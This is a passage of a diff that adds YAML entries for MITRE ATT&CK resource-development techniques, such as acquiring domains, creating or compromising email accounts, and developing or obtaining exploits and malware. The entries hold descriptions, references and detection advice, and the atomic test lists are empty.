+ url: https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/
+ - source_name: CISA IDN ST05-016
+ url: https://us-cert.cisa.gov/ncas/tips/ST05-016
+ description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
+ Internationalized Domain Names. Retrieved October 20, 2020.'
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domains
+ description: |-
+ Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
+
+ Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)
+
+ Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+ id: attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T20:25:29.310Z'
+ created: '2020-09-30T17:09:31.878Z'
+ x_mitre_contributors:
+ - Wes Hurd
+ - Vinayak Wadhwa, Lucideus
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Domain registration
+ x_mitre_detection: |-
+ Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.001
+ url: https://attack.mitre.org/techniques/T1584/001
+ - source_name: ICANNDomainNameHijacking
+ description: 'ICANN Security and Stability Advisory Committee. (2005, July
+ 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved
+ March 6, 2017.'
+ url: https://www.icann.org/groups/ssac/documents/sac-007-en
+ - source_name: Microsoft Sub Takeover 2020
+ url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
+ description: Microsoft. (2020, September 29). Prevent dangling DNS entries
+ and avoid subdomain takeover. Retrieved October 12, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domains
+ description: |-
+ Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.
+
+ Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
+ id: attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T01:28:56.664Z'
+ created: '2020-10-01T00:51:28.513Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1585.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1585.002
+ url: https://attack.mitre.org/techniques/T1585/002
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: Trend Micro R980 2016
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/
+ description: Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware
+ Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Accounts
+ description: |-
+ Before compromising a victim, adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
+
+ To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)
+ id: attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-14T00:48:47.515Z'
+ created: '2020-10-01T01:09:53.217Z'
+ x_mitre_detection: 'Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1586.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1586.002
+ url: https://attack.mitre.org/techniques/T1586/002
+ - source_name: AnonHBGary
+ description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside
+ story of the HBGary hack. Retrieved March 9, 2017.'
+ url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Accounts
+ description: |-
+ Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
+
+ A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
+
+ Adversaries can use a compromised email account to hijack existing email threads with targets of interest.
+ id: attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T16:40:58.761Z'
+ created: '2020-10-01T01:20:53.104Z'
+ x_mitre_detection: 'Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1585:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1585
+ url: https://attack.mitre.org/techniques/T1585
+ - source_name: NEWSCASTER2014
+ description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials
+ in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.
+ url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
+ - source_name: BlackHatRobinSage
+ description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
+ March 6, 2017.
+ url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Establish Accounts
+ description: |-
+ Before compromising a victim, adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
+
+ For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
+
+ Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)
+ id: attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:20:40.675Z'
+ created: '2020-10-01T01:05:42.216Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.004
+ url: https://attack.mitre.org/techniques/T1587/004
+ - source_name: NYTStuxnet
+ description: William J. Broad, John Markoff, and David E. Sanger. (2011, January
+ 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved
+ March 1, 2017.
+ url: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
+ - source_name: Irongeek Sims BSides 2017
+ url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
+ description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
+ Exploitation. Retrieved October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exploits
+ description: |-
+ Before compromising a victim, adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
+
+ As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.
+
+ Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ id: attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T03:09:34.771Z'
+ created: '2020-10-01T01:48:15.511Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on behaviors relating to the use of exploits (i.e.
+ [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190),
+ [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203),
+ [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068),
+ [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211),
+ [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212),
+ [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210),
+ and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.005
+ url: https://attack.mitre.org/techniques/T1588/005
+ - source_name: Exploit Database
+ url: https://www.exploit-db.com/
+ description: Offensive Security. (n.d.). Exploit Database. Retrieved October
+ 15, 2020.
+ - source_name: TempertonDarkHotel
+ description: Temperton, J. (2015, August 10). Hacking Team zero-day used in
+ new Darkhotel attacks. Retrieved March 9, 2017.
+ url: https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ source_name: PegasusCitizenLab
+ - source_name: Wired SandCat Oct 2019
+ url: https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec
+ description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
+ Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
+ October 15, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exploits
+ description: |-
+ Before compromising a victim, adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
+
+ In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
+
+ An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
+
+ Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ id: attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-18T21:47:09.385Z'
+ created: '2020-10-01T02:17:46.086Z'
+ x_mitre_detection: |2-
+
+ Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.001
+ url: https://attack.mitre.org/techniques/T1587/001
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: ActiveMalwareEnergy
+ description: Dan Goodin. (2014, June 30). Active malware operation let attackers
+ sabotage US energy industry. Retrieved March 9, 2017.
+ url: https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/
+ - source_name: FBI Flash FIN7 USB
+ url: https://www.losangeles.va.gov/documents/MI-000120-MW.pdf
+ description: Federal Bureau of Investigation, Cyber Division. (2020, March
+ 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection
+ Attacks. Retrieved October 14, 2020.
+ - source_name: FireEye APT29
+ description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
+ a Russian Cyber Threat Group. Retrieved September 17, 2015.'
+ url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Malware
+ description: |-
+ Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
+
+ As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
+
+ Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)
+ id: attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T13:05:43.492Z'
+ created: '2020-10-01T01:33:01.433Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.001
+ url: https://attack.mitre.org/techniques/T1588/001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Malware
+ description: |-
+ Before compromising a victim, adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
+
+ In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).
+ id: attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-15T20:46:54.437Z'
+ created: '2020-10-01T02:06:11.499Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588
+ url: https://attack.mitre.org/techniques/T1588
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ source_name: PegasusCitizenLab
+ - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ source_name: DiginotarCompromise
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Obtain Capabilities
+ description: |-
+ Before compromising a victim, adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
+
+ In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
+
+ In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:22:21.135Z'
+ created: '2020-10-01T01:56:24.776Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Defense Evasion or Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.004
+ url: https://attack.mitre.org/techniques/T1583/004
+ - source_name: NYTStuxnet
+ description: William J. Broad, John Markoff, and David E. Sanger. (2011, January
+ 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved
+ March 1, 2017.
+ url: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Server
+ description: |-
+ Before compromising a victim, adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
+
+ Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
+ id: attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-12T16:49:11.340Z'
+ created: '2020-10-01T00:48:09.578Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.004
+ url: https://attack.mitre.org/techniques/T1584/004
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Server
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
+
+ Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
+ id: attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-12T19:48:07.710Z'
+ created: '2020-10-01T00:56:25.135Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1585.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1585.001
+ url: https://attack.mitre.org/techniques/T1585/001
+ - source_name: NEWSCASTER2014
